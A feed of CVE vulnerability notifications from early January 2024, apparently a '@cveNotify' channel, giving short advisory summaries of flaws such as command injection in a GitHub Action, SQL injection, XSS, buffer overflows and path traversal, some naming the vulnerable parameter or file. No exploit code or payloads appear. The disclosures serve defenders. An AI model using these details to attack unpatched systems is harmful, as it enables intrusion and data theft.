🚨 CVE-2023-52137The [`tj-actions/verify-changed-files`](https://github.com/tj-actions/verify-changed-files) action allows for command injection in changed filenames, allowing an attacker to execute arbitrary code and potentially leak secrets. The [`verify-changed-files`](https://github.com/tj-actions/verify-changed-files) workflow returns the list of files changed within a workflow execution. This could potentially allow filenames that contain special characters such as `;` which can be used by an attacker to take over the [GitHub Runner](https://docs.github.com/en/actions/using-github-hosted-runners/about-github-hosted-runners) if the output value is used in a raw fashion (thus being directly replaced before execution) inside a `run` block. By running custom commands, an attacker may be able to steal secrets such as `GITHUB_TOKEN` if triggered on other events than `pull_request`.This has been patched in versions [17](https://github.com/tj-actions/verify-changed-files/releases/tag/v17) and [17.0.0](https://github.com/tj-actions/verify-changed-files/releases/tag/v17.0.0) by enabling `safe_output` by default and returning filename paths escaping special characters for bash environments.🎖@cveNotify |
|
| 2024-01-10 16:37:32 |
🚨 CVE-2024-20804Path traversal vulnerability in FileUriConverter of MyFiles prior to SMR Jan-2024 Release 1 in Android 11 and Android 12, and version 14.5.00.21 in Android 13 allows attackers to write arbitrary file.🎖@cveNotify |
|
| 2024-01-10 16:37:26 |
🚨 CVE-2024-20803Improper authentication vulnerability in Bluetooth pairing process prior to SMR Jan-2024 Release 1 allows remote attackers to establish pairing process without user interaction.🎖@cveNotify |
|
| 2024-01-10 16:37:25 |
🚨 CVE-2023-6918A flaw was found in the libssh implements abstract layer for message digest (MD) operations implemented by different supported crypto backends. The return values from these were not properly checked, which could cause low-memory situations failures, NULL dereferences, crashes, or usage of the uninitialized memory as an input for the KDF. In this case, non-matching keys will result in decryption/integrity failures, terminating the connection.🎖@cveNotify |
|
| 2024-01-10 16:37:24 |
🚨 CVE-2023-28388Uncontrolled search path element in some Intel(R) Chipset Device Software before version 10.1.19444.8378 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-01-10 16:07:25 |
🚨 CVE-2023-51154Jizhicms v2.5 was discovered to contain an arbitrary file download vulnerability via the component /admin/c/PluginsController.php.🎖@cveNotify |
|
| 2024-01-10 16:07:24 |
🚨 CVE-2023-6270A flaw was found in the ATA over Ethernet (AoE) driver in the Linux kernel. The aoecmd_cfg_pkts() function improperly updates the refcnt on `struct net_device`, and a use-after-free can be triggered by racing between the free on the struct and the access through the `skbtxq` global queue. This could lead to a denial of service condition or potential code execution.🎖@cveNotify |
|
| 2024-01-10 15:37:38 |
🚨 CVE-2023-49619Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in Apache Answer.This issue affects Apache Answer: through 1.2.0.Under normal circumstances, a user can only bookmark a question once, and will only increase the number of questions bookmarked once. However, repeat submissions through the script can increase the number of collection of the question many times.Users are recommended to upgrade to version [1.2.1], which fixes the issue.🎖@cveNotify |
|
| 2024-01-10 15:37:31 |
🚨 CVE-2023-6493The Depicter Slider – Responsive Image Slider, Video Slider & Post Slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.6. This is due to missing or incorrect nonce validation on the 'save' function. This makes it possible for unauthenticated attackers to modify the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. CVE-2023-51491 appears to be a duplicate of this issue.🎖@cveNotify |
|
| 2024-01-10 15:37:30 |
🚨 CVE-2024-20807Implicit intent hijacking vulnerability in Samsung Email prior to version 6.1.90.16 allows attacker to get sensitive information.🎖@cveNotify |
|
| 2024-01-10 15:37:26 |
🚨 CVE-2023-5367A out-of-bounds write flaw was found in the xorg-x11-server. This issue occurs due to an incorrect calculation of a buffer offset when copying data stored in the heap in the XIChangeDeviceProperty function in Xi/xiproperty.c and in RRChangeOutputProperty function in randr/rrproperty.c, allowing for possible escalation of privileges or denial of service.🎖@cveNotify |
|
| 2024-01-10 15:37:25 |
🚨 CVE-2023-42753An array indexing vulnerability was found in the netfilter subsystem of the Linux kernel. A missing macro could lead to a miscalculation of the `h->nets` array offset, providing attackers with the primitive to arbitrarily increment/decrement a memory buffer out-of-bound. This issue may allow a local user to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-01-10 15:37:24 |
🚨 CVE-2023-3019A DMA reentrancy issue leading to a use-after-free error was found in the e1000e NIC emulation code in QEMU. This issue could allow a privileged guest user to crash the QEMU process on the host, resulting in a denial of service.🎖@cveNotify |
|
| 2024-01-10 15:07:24 |
🚨 CVE-2024-22075Firefly III (aka firefly-iii) before 6.1.1 allows webhooks HTML Injection.🎖@cveNotify |
|
| 2024-01-10 14:07:33 |
🚨 CVE-2023-31446In Cassia Gateway firmware XC1000_2.1.1.2303082218 and XC2000_2.1.1.2303090947, the queueUrl parameter in /bypass/config is not sanitized. This leads to injecting Bash code and executing it with root privileges on device startup.🎖@cveNotify |
|
| 2024-01-10 14:07:26 |
🚨 CVE-2024-0359A vulnerability was found in code-projects Simple Online Hotel Reservation System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250126 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-10 14:07:25 |
🚨 CVE-2023-50922An issue was discovered on GL.iNet devices through 4.5.0. Attackers who are able to steal the AdminToken cookie can execute arbitrary code by uploading a crontab-formatted file to a specific directory and waiting for its execution. This affects A1300 4.4.6, AX1800 4.4.6, AXT1800 4.4.6, MT3000 4.4.6, MT2500 4.4.6, MT6000 4.5.0, MT1300 4.3.7, MT300N-V2 4.3.7, AR750S 4.3.7, AR750 4.3.7, AR300M 4.3.7, and B1300 4.3.7.🎖@cveNotify |
|
| 2024-01-10 13:37:32 |
🚨 CVE-2023-48253The vulnerability allows a remote authenticated attacker to read or update arbitrary content of the authentication database via a crafted HTTP request.By abusing this vulnerability it is possible to exfiltrate other users’ password hashes or update them with arbitrary values and access their accounts.🎖@cveNotify |
|
| 2024-01-10 13:37:26 |
🚨 CVE-2023-48252The vulnerability allows an authenticated remote attacker to perform actions exceeding their authorized access via crafted HTTP requests.🎖@cveNotify |
|
| 2024-01-10 13:37:25 |
🚨 CVE-2023-38858Buffer Overflow vulnerability infaad2 v.2.10.1 allows a remote attacker to execute arbitrary code and cause a denial of service via the mp4info function in mp4read.c:1039.🎖@cveNotify |
|
| 2024-01-10 13:37:24 |
🚨 CVE-2023-38857Buffer Overflow vulnerability infaad2 v.2.10.1 allows a remote attacker to execute arbitrary code and cause a denial of service via the stcoin function in mp4read.c.🎖@cveNotify |
|
| 2024-01-10 11:37:32 |
🚨 CVE-2023-48247The vulnerability allows an unauthenticated remote attacker to read arbitrary files under the context of the application OS user (“root”) via a crafted HTTP request.🎖@cveNotify |
|
| 2024-01-10 11:37:26 |
🚨 CVE-2023-48246The vulnerability allows a remote attacker to download arbitrary files in all paths of the system under the context of the application OS user (“root”) via a crafted HTTP request.🎖@cveNotify |
|
| 2024-01-10 11:37:25 |
🚨 CVE-2023-48243The vulnerability allows a remote attacker to upload arbitrary files in all paths of the system under the context of the application OS user (“root”) via a crafted HTTP request.By abusing this vulnerability, it is possible to obtain remote code execution (RCE) with root privileges on the device.🎖@cveNotify |
|
| 2024-01-10 11:37:24 |
🚨 CVE-2023-48242The vulnerability allows an authenticated remote attacker to download arbitrary files in all paths of the system under the context of the application OS user (“root”) via a crafted HTTP request.🎖@cveNotify |
|
| 2024-01-10 09:37:37 |
🚨 CVE-2023-51252PublicCMS 4.0 is vulnerable to Cross Site Scripting (XSS). Because files can be uploaded and online preview function is provided, pdf files and html files containing malicious code are uploaded, an XSS popup window is realized through online viewing.🎖@cveNotify |
|
| 2024-01-10 09:37:31 |
🚨 CVE-2023-50120MP4Box GPAC version 2.3-DEV-rev636-gfbd7e13aa-master was discovered to contain an infinite loop in the function av1_uvlc at media_tools/av_parsers.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted MP4 file.🎖@cveNotify |
|
| 2024-01-10 09:37:30 |
🚨 CVE-2023-49427Buffer Overflow vulnerability in Tenda AX12 V22.03.01.46, allows remote attackers to cause a denial of service (DoS) via list parameter in SetNetControlList function.🎖@cveNotify |
|
| 2024-01-10 09:37:29 |
🚨 CVE-2023-49394Zentao versions 4.1.3 and before has a URL redirect vulnerability, which prevents the system from functioning properly.🎖@cveNotify |
|
| 2024-01-10 09:37:26 |
🚨 CVE-2020-26630A Time-Based SQL Injection vulnerability was discovered in Hospital Management System V4.0 which can allow an attacker to dump database information via a special payload in the 'Doctor Specialization' field under the 'Go to Doctors' tab after logging in as an admin.🎖@cveNotify |
|
| 2024-01-10 09:37:25 |
🚨 CVE-2020-26627A Time-Based SQL Injection vulnerability was discovered in Hospital Management System V4.0 which can allow an attacker to dump database information via a crafted payload entered into the 'Admin Remark' parameter under the 'Contact Us Queries -> Unread Query' tab.🎖@cveNotify |
|
| 2024-01-10 09:37:24 |
🚨 CVE-2023-6546A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.🎖@cveNotify |
|
| 2024-01-10 08:37:25 |
🚨 CVE-2023-48864SEMCMS v4.8 was discovered to contain a SQL injection vulnerability via the languageID parameter in /web_inc.php.🎖@cveNotify |
|
| 2024-01-10 08:37:24 |
🚨 CVE-2022-46025Totolink N200RE_V5 V9.3.5u.6255_B20211224 is vulnerable to Incorrect Access Control. The device allows remote attackers to obtain Wi-Fi system information, such as Wi-Fi SSID and Wi-Fi password, without logging into the management page.🎖@cveNotify |
|
| 2024-01-10 07:37:24 |
🚨 CVE-2023-41781There is a Cross-site scripting (XSS) vulnerability in ZTE MF258. Due to insufficient input validation of SMS interface parameter, an XSS attack will be triggered.🎖@cveNotify |
|
| 2024-01-10 05:37:24 |
🚨 CVE-2024-21643IdentityModel Extensions for .NET provide assemblies for web developers that wish to use federated identity providers for establishing the caller's identity. Anyone leveraging the `SignedHttpRequest`protocol or the `SignedHttpRequestValidator`is vulnerable. Microsoft.IdentityModel trusts the `jku`claim by default for the `SignedHttpRequest`protocol. This raises the possibility to make any remote or local `HTTP GET` request. The vulnerability has been fixed in Microsoft.IdentityModel.Protocols.SignedHttpRequest. Users should update all their Microsoft.IdentityModel versions to 7.1.2 (for 7x) or higher, 6.34.0 (for 6x) or higher.🎖@cveNotify |
|
| 2024-01-10 04:07:32 |
🚨 CVE-2023-52126Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Suman Bhattarai Send Users Email.This issue affects Send Users Email: from n/a through 1.4.3.🎖@cveNotify |
|
| 2024-01-10 04:07:26 |
🚨 CVE-2023-52125Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in webvitaly iframe allows Stored XSS.This issue affects iframe: from n/a through 4.8.🎖@cveNotify |
|
| 2024-01-10 04:07:25 |
🚨 CVE-2023-52148Exposure of Sensitive Information to an Unauthorized Actor vulnerability in wp.Insider, wpaffiliatemgr Affiliates Manager.This issue affects Affiliates Manager: from n/a through 2.9.30.🎖@cveNotify |
|
| 2024-01-10 04:07:24 |
🚨 CVE-2023-51678Cross-Site Request Forgery (CSRF) vulnerability in Doofinder Doofinder WP & WooCommerce Search.This issue affects Doofinder WP & WooCommerce Search: from n/a through 2.0.33.🎖@cveNotify |
|
| 2024-01-10 03:37:32 |
🚨 CVE-2023-49993Espeak-ng 1.52-dev was discovered to contain a Buffer Overflow via the function ReadClause at readclause.c.🎖@cveNotify |
|
| 2024-01-10 03:37:26 |
🚨 CVE-2023-49992Espeak-ng 1.52-dev was discovered to contain a Stack Buffer Overflow via the function RemoveEnding at dictionary.c.🎖@cveNotify |
|
| 2024-01-10 03:37:25 |
🚨 CVE-2023-44796Cross Site Scripting (XSS) vulnerability in LimeSurvey before version 6.2.9-230925 allows a remote attacker to escalate privileges via a crafted script to the _generaloptions_panel.php component.🎖@cveNotify |
|
| 2024-01-10 03:37:24 |
🚨 CVE-2022-45611An issue was discovered in Fresenius Kabi PharmaHelp 5.1.759.0 allows attackers to gain escalated privileges via via capture of user login information.🎖@cveNotify |
|
| 2024-01-10 02:37:24 |
🚨 CVE-2024-0359A vulnerability was found in code-projects Simple Online Hotel Reservation System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250126 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-10 01:37:32 |
🚨 CVE-2023-49633Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'buyer_address' parameter of the buyer_detail_submit.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2024-01-10 01:37:26 |
🚨 CVE-2023-49625Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'id' parameter of the partylist_edit_submit.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2024-01-10 01:37:25 |
🚨 CVE-2023-6992Cloudflare version of zlib library was found to be vulnerable to memory corruption issues affecting the deflation algorithm implementation (deflate.c). The issues resulted from improper input validation and heap-based buffer overflow.A local attacker could exploit the problem during compression using a crafted malicious file potentially leading to denial of service of the software.Patches: The issue has been patched in commit 8352d10 https://github.com/cloudflare/zlib/commit/8352d108c05db1bdc5ac3bdf834dad641694c13c . The upstream repository is not affected.🎖@cveNotify |
|
| 2024-01-10 01:37:24 |
🚨 CVE-2023-6600The OMGF | GDPR/DSGVO Compliant, Faster Google Fonts. Easy. plugin for WordPress is vulnerable to unauthorized modification of data and Stored Cross-Site Scripting due to a missing capability check on the update_settings() function hooked via admin_init in all versions up to, and including, 5.7.9. This makes it possible for unauthenticated attackers to update the plugin's settings which can be used to inject Cross-Site Scripting payloads and delete entire directories. PLease note there were several attempted patched, and we consider 5.7.10 to be the most sufficiently patched.🎖@cveNotify |
|
| 2024-01-10 00:37:32 |
🚨 CVE-2023-47997An issue discovered in BitmapAccess.cpp::FreeImage_AllocateBitmap in FreeImage 3.18.0 leads to an infinite loop and allows attackers to cause a denial of service.🎖@cveNotify |
|
| 2024-01-10 00:37:25 |
🚨 CVE-2023-48656An issue was discovered in MISP before 2.4.176. app/Model/AppModel.php mishandles order clauses.🎖@cveNotify |
|
| 2024-01-10 00:37:24 |
🚨 CVE-2023-48655An issue was discovered in MISP before 2.4.176. app/Controller/Component/IndexFilterComponent.php does not properly filter out query parameters.🎖@cveNotify |
|
| 2024-01-09 23:37:32 |
🚨 CVE-2023-37296AMI’sSPx contains a vulnerability in the BMC where an Attacker maycause a stack memory corruption via an adjacent network. A successful exploitationof this vulnerability may lead to a loss of confidentiality, integrity, and/oravailability.🎖@cveNotify |
|
| 2024-01-09 23:37:25 |
🚨 CVE-2023-34333AMI’s SPx containsa vulnerability in the BMC where an Attacker may cause anuntrusted pointer to dereference via a local network. A successful exploitationof this vulnerability may lead to a loss of confidentiality, integrity, and/oravailability.🎖@cveNotify |
|
| 2024-01-09 23:37:24 |
🚨 CVE-2023-34332AMI’s SPx containsa vulnerability in the BMC where an Attackermay cause an untrusted pointer to dereference by a local network. A successfulexploitation of this vulnerability may lead to a loss of confidentiality,integrity, and/or availability.🎖@cveNotify |
|
| 2024-01-09 22:37:32 |
🚨 CVE-2024-0347A vulnerability was found in SourceCodester Engineers Online Portal 1.0 and classified as problematic. This issue affects some unknown processing of the file signup_teacher.php. The manipulation of the argument Password leads to weak password requirements. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250115.🎖@cveNotify |
|
| 2024-01-09 22:37:26 |
🚨 CVE-2024-0346A vulnerability has been found in CodeAstro Vehicle Booking System 1.0 and classified as problematic. This vulnerability affects unknown code of the file usr/user-give-feedback.php of the component Feedback Page. The manipulation of the argument My Testemonial leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250114 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-09 22:37:25 |
🚨 CVE-2023-50136Cross Site Scripting (XSS) vulnerability in JFinalcms 5.0.0 allows attackers to run arbitrary code via the name field when creating a new custom table.🎖@cveNotify |
|
| 2024-01-09 22:37:24 |
🚨 CVE-2023-38827Cross Site Scripting vulnerability in Follet School Solutions Destiny v.20_0_1_AU4 and later allows a remote attacker to run arbitrary code via presentonesearchresultsform.do.🎖@cveNotify |
|
| 2024-01-09 21:37:30 |
🚨 CVE-2023-50090Arbitrary File Write vulnerability in the saveReportFile method of ureport2 2.2.9 and before allows attackers to write arbitrary files and run arbitrary commands via crafted POST request.🎖@cveNotify |
|
| 2024-01-09 21:37:25 |
🚨 CVE-2023-52263Brave Browser before 1.59.40 does not properly restrict the schema for WebUI factory and redirect. This is related to browser/brave_content_browser_client.cc and browser/ui/webui/brave_web_ui_controller_factory.cc.🎖@cveNotify |
|
| 2024-01-09 21:37:24 |
🚨 CVE-2023-6927A flaw was found in Keycloak. This issue may allow an attacker to steal authorization codes or tokens from clients using a wildcard in the JARM response mode "form_post.jwt" which could be used to bypass the security patch implemented to address CVE-2023-6134.🎖@cveNotify |
|
| 2024-01-09 21:07:32 |
🚨 CVE-2023-37608An issue in Automatic Systems SOC FL9600 FastLine v.lego_T04E00 allows a remote attacker to obtain sensitive information via the admin login credentials.🎖@cveNotify |
|
| 2024-01-09 21:07:25 |
🚨 CVE-2023-50094reNgine through 2.0.2 allows OS Command Injection if an adversary has a valid session ID. The attack places shell metacharacters in an api/tools/waf_detector/?url= string. The commands are executed as root via subprocess.check_output.🎖@cveNotify |
|
| 2024-01-09 21:07:24 |
🚨 CVE-2023-21739Windows Bluetooth Driver Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-01-09 20:07:32 |
🚨 CVE-2023-41779There is an illegal memory access vulnerability of ZTE's ZXCLOUD iRAI product.When the vulnerability is exploited by an attacker with the common user permission, the physical machine will be crashed.🎖@cveNotify |
|
| 2024-01-09 20:07:26 |
🚨 CVE-2023-41776There is a local privilege escalation vulnerability of ZTE's ZXCLOUD iRAI.Attackers with regular user privileges can create a fake process, and to escalate local privileges.🎖@cveNotify |
|
| 2024-01-09 20:07:25 |
🚨 CVE-2023-7102Use of a Third Party library produced a vulnerability in Barracuda Networks Inc. Barracuda ESG Appliance which allowed Parameter Injection.This issue affected Barracuda ESG Appliance, from 5.1.3.001 through 9.2.1.001, until Barracuda removed the vulnerable logic.🎖@cveNotify |
|
| 2024-01-09 19:37:44 |
🚨 CVE-2023-51784Improper Control of Generation of Code ('Code Injection') vulnerability in Apache InLong.This issue affects Apache InLong: from 1.5.0 through 1.9.0, which could lead to Remote Code Execution. Users are advised to upgrade to Apache InLong's 1.10.0 or cherry-pick [1] to solve it.[1] https://github.com/apache/inlong/pull/9329🎖@cveNotify |
|
| 2024-01-09 19:37:37 |
🚨 CVE-2023-33120Memory corruption in Audio when memory map command is executed consecutively in ADSP.🎖@cveNotify |
|
| 2024-01-09 19:37:36 |
🚨 CVE-2023-33112Transient DOS when WLAN firmware receives "reassoc response" frame including RIC_DATA element.🎖@cveNotify |
|
| 2024-01-09 19:37:32 |
🚨 CVE-2023-33110The session index variable in PCM host voice audio driver initialized before PCM open, accessed during event callback from ADSP and reset during PCM close may lead to race condition between event callback - PCM close and reset session index causing memory corruption.🎖@cveNotify |
|
| 2024-01-09 19:37:31 |
🚨 CVE-2023-33040Transient DOS in Data Modem during DTLS handshake.🎖@cveNotify |
|
| 2024-01-09 19:37:26 |
🚨 CVE-2023-33037Cryptographic issue in Automotive while unwrapping the key secs2d and verifying with RPMB data.🎖@cveNotify |
|
| 2024-01-09 19:37:25 |
🚨 CVE-2021-38606reNgine through 0.5 relies on a predictable directory name.🎖@cveNotify |
|
| 2024-01-09 19:07:33 |
🚨 CVE-2023-6621The POST SMTP WordPress plugin before 2.8.7 does not sanitise and escape the msg parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.🎖@cveNotify |
|
| 2024-01-09 19:07:26 |
🚨 CVE-2023-6981The WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc plugin for WordPress is vulnerable to SQL Injection via the 'group_id' parameter in all versions up to, and including, 6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This can leveraged to achieve Reflected Cross-site Scripting.🎖@cveNotify |
|
| 2024-01-09 19:07:25 |
🚨 CVE-2023-45723HCL DRYiCE MyXalytics is impacted by path traversal vulnerability which allows file upload capability. Certain endpoints permit users to manipulate the path (including the file name) where these files are stored on the server.🎖@cveNotify |
|
| 2024-01-09 18:37:32 |
🚨 CVE-2023-29049The "upsell" widget at the portal page could be abused to inject arbitrary script code. Attackers that manage to lure users to a compromised account, or gain temporary access to a legitimate account, could inject script code to gain persistent code execution capabilities under a trusted domain. User input for this widget is now sanitized to avoid malicious content the be processed. No publicly available exploits are known.🎖@cveNotify |
|
| 2024-01-09 18:37:25 |
🚨 CVE-2023-26159Versions of the package follow-redirects before 1.15.4 are vulnerable to Improper Input Validation due to the improper handling of URLs by the url.parse() function. When new URL() throws an error, it can be manipulated to misinterpret the hostname. An attacker could exploit this weakness to redirect traffic to a malicious site, potentially leading to information disclosure, phishing attacks, or other security breaches.🎖@cveNotify |
|
| 2024-01-09 18:37:24 |
🚨 CVE-2023-50096STMicroelectronics STSAFE-A1xx middleware before 3.3.7 allows MCU code execution if an adversary has the ability to read from and write to the I2C bus. This is caused by an StSafeA_ReceiveBytes buffer overflow in the X-CUBE-SAFEA1 Software Package for STSAFE-A sample applications (1.2.0), and thus can affect user-written code that was derived from a published sample application.🎖@cveNotify |
|
| 2024-01-09 18:07:32 |
🚨 CVE-2023-46308In Plotly plotly.js before 2.25.2, plot API calls have a risk of __proto__ being polluted in expandObjectPaths or nestedProperty.🎖@cveNotify |
|
| 2024-01-09 18:07:25 |
🚨 CVE-2023-50342HCL DRYiCE MyXalytics is impacted by an Insecure Direct Object Reference (IDOR) vulnerability. A user can obtain certain details about another user as a result of improper access control.🎖@cveNotify |
|
| 2024-01-09 18:07:24 |
🚨 CVE-2024-21632omniauth-microsoft_graph provides an Omniauth strategy for the Microsoft Graph API. Prior to versions 2.0.0, the implementation did not validate the legitimacy of the `email` attribute of the user nor did it give/document an option to do so, making it susceptible to nOAuth misconfiguration in cases when the `email` is used as a trusted user identifier. This could lead to account takeover. Version 2.0.0 contains a fix for this issue.🎖@cveNotify |
|
| 2024-01-09 17:07:30 |
🚨 CVE-2023-49558An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expand_mmac_params function in the modules/preprocs/nasm/nasm-pp.c component.🎖@cveNotify |
|
| 2024-01-09 17:07:29 |
🚨 CVE-2023-49557An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the yasm_section_bcs_first function in the libyasm/section.c component.🎖@cveNotify |
|
| 2024-01-09 17:07:26 |
🚨 CVE-2023-49555An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expand_smacro function in the modules/preprocs/nasm/nasm-pp.c component.🎖@cveNotify |
|
| 2024-01-09 17:07:25 |
🚨 CVE-2022-3010The Priva TopControl Suite contains predictable credentials for the SSH service, based on the Serial number. Which makes it possible for an attacker to calculate the login credentials for the Priva TopControll suite.🎖@cveNotify |
|
| 2024-01-09 17:07:24 |
🚨 CVE-2023-4280An unvalidated input in Silicon Labs TrustZone implementation in v4.3.x and earlier of the Gecko SDK allows an attacker to access the trusted region of memory from the untrusted region.🎖@cveNotify |
|
| 2024-01-09 16:37:35 |
🚨 CVE-2023-7223A vulnerability classified as problematic has been found in Totolink T6 4.1.9cu.5241_B20210923. This affects an unknown part of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument topicurl with the input showSyslog leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249867. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-09 16:37:31 |
🚨 CVE-2023-7222A vulnerability was found in Totolink X2000R 1.0.0-B20221212.1452. It has been declared as critical. This vulnerability affects the function formTmultiAP of the file /bin/boa of the component HTTP POST Request Handler. The manipulation of the argument submit-url leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249856. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-09 16:37:30 |
🚨 CVE-2024-21636view_component is a framework for building reusable, testable, and encapsulated view components in Ruby on Rails. Versions prior to 3.9.0 and 2.83.0 have a cross-site scripting vulnerability that has the potential to impact anyone rendering a component directly from a controller with the view_component gem. Note that only components that define a `#call` method (i.e. instead of using a sidecar template) are affected. The return value of the `#call` method is not sanitized and can include user-defined content. In addition, the return value of the `#output_postamble` methodis not sanitized, which can also lead to cross-site scripting issues. Versions 3.9.0 and 2.83.0 have been released and fully mitigate both the `#call` and the `#output_postamble` vulnerabilities. As a workaround, sanitize the return value of `#call`.🎖@cveNotify |
|
| 2024-01-09 16:37:26 |
🚨 CVE-2023-49549An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_getretvalpos function in the msj.c file.🎖@cveNotify |
|
| 2024-01-09 16:37:25 |
🚨 CVE-2023-6339Google Nest WiFi Pro root code-execution & user-data compromise🎖@cveNotify |
|
| 2024-01-09 16:37:24 |
🚨 CVE-2023-48308Nextcloud/Cloud is a calendar app for Nextcloud. An attacker can gain access to stacktrace and internal paths of the server when generating an exception while editing a calendar appointment. It is recommended that the Nextcloud Calendar app is upgraded to 4.5.3🎖@cveNotify |
|
| 2024-01-09 16:07:25 |
🚨 CVE-2023-4164There is a possible information disclosure due to a missing permission check. This could lead to local information disclosure of health data with no additional execution privileges needed.🎖@cveNotify |
|
| 2024-01-09 16:07:24 |
🚨 CVE-2023-51708Bentley eB System Management Console applications within Assetwise Integrity Information Server allow an unauthenticated user to view configuration options via a crafted request, leading to information disclosure. This affects eB System management Console before 23.00.02.03 and Assetwise ALIM For Transportation before 23.00.01.25.🎖@cveNotify |
|
| 2024-01-09 15:37:31 |
🚨 CVE-2023-50991Buffer Overflow vulnerability in Tenda i29 versions 1.0 V1.0.0.5 and 1.0 V1.0.0.2, allows remote attackers to cause a denial of service (DoS) via the pingIp parameter in the pingSet function.🎖@cveNotify |
|
| 2024-01-09 15:37:30 |
🚨 CVE-2018-25097A vulnerability, which was classified as problematic, was found in Acumos Design Studio up to 2.0.7. Affected is an unknown function. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 2.0.8 is able to address this issue. The name of the patch is 0df8a5e8722188744973168648e4c74c69ce67fd. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-249420.🎖@cveNotify |
|
| 2024-01-09 15:37:26 |
🚨 CVE-2023-33032Memory corruption in TZ Secure OS while requesting a memory allocation from TA region.🎖@cveNotify |
|
| 2024-01-09 15:37:25 |
🚨 CVE-2023-42753An array indexing vulnerability was found in the netfilter subsystem of the Linux kernel. A missing macro could lead to a miscalculation of the `h->nets` array offset, providing attackers with the primitive to arbitrarily increment/decrement a memory buffer out-of-bound. This issue may allow a local user to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-01-09 15:07:30 |
🚨 CVE-2023-7221A vulnerability was found in Totolink T6 4.1.9cu.5241_B20210923. It has been classified as critical. This affects the function main of the file /cgi-bin/cstecgi.cgi?action=login of the component HTTP POST Request Handler. The manipulation of the argument v41 leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249855. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-09 15:07:26 |
🚨 CVE-2023-51538Cross-Site Request Forgery (CSRF) vulnerability in Awesome Support Team Awesome Support – WordPress HelpDesk & Support Plugin.This issue affects Awesome Support – WordPress HelpDesk & Support Plugin: from n/a through 6.1.5.🎖@cveNotify |
|
| 2024-01-09 15:07:25 |
🚨 CVE-2023-33014Information disclosure in Core services while processing a Diag command.🎖@cveNotify |
|
| 2024-01-09 15:07:24 |
🚨 CVE-2023-6094A vulnerability has been identified in OnCell G3150A-LTE Series firmware versions v1.3 and prior. The vulnerability results from lack of protection for sensitive information during transmission. An attacker eavesdropping on the traffic between the web browser and server may obtain sensitive information. This type of attack could be executed to gather sensitive information or to facilitate a subsequent attack against the target.🎖@cveNotify |
|
| 2024-01-09 14:37:32 |
🚨 CVE-2023-51673Cross-Site Request Forgery (CSRF) vulnerability in Designful Stylish Price List – Price Table Builder & QR Code Restaurant Menu.This issue affects Stylish Price List – Price Table Builder & QR Code Restaurant Menu: from n/a through 7.0.17.🎖@cveNotify |
|
| 2024-01-09 14:37:26 |
🚨 CVE-2023-51668Cross-Site Request Forgery (CSRF) vulnerability in WP Zone Inline Image Upload for BBPress.This issue affects Inline Image Upload for BBPress: from n/a through 1.1.18.🎖@cveNotify |
|
| 2024-01-09 14:37:25 |
🚨 CVE-2023-48121An authentication bypass vulnerability in the Direct Connection Module in Ezviz CS-C6N-xxx prior to v5.3.x build 20230401, Ezviz CS-CV310-xxx prior to v5.3.x build 20230401, Ezviz CS-C6CN-xxx prior to v5.3.x build 20230401, Ezviz CS-C3N-xxx prior to v5.3.x build 20230401 allows remote attackers to obtain sensitive information by sending crafted messages to the affected devices.🎖@cveNotify |
|
| 2024-01-09 14:37:24 |
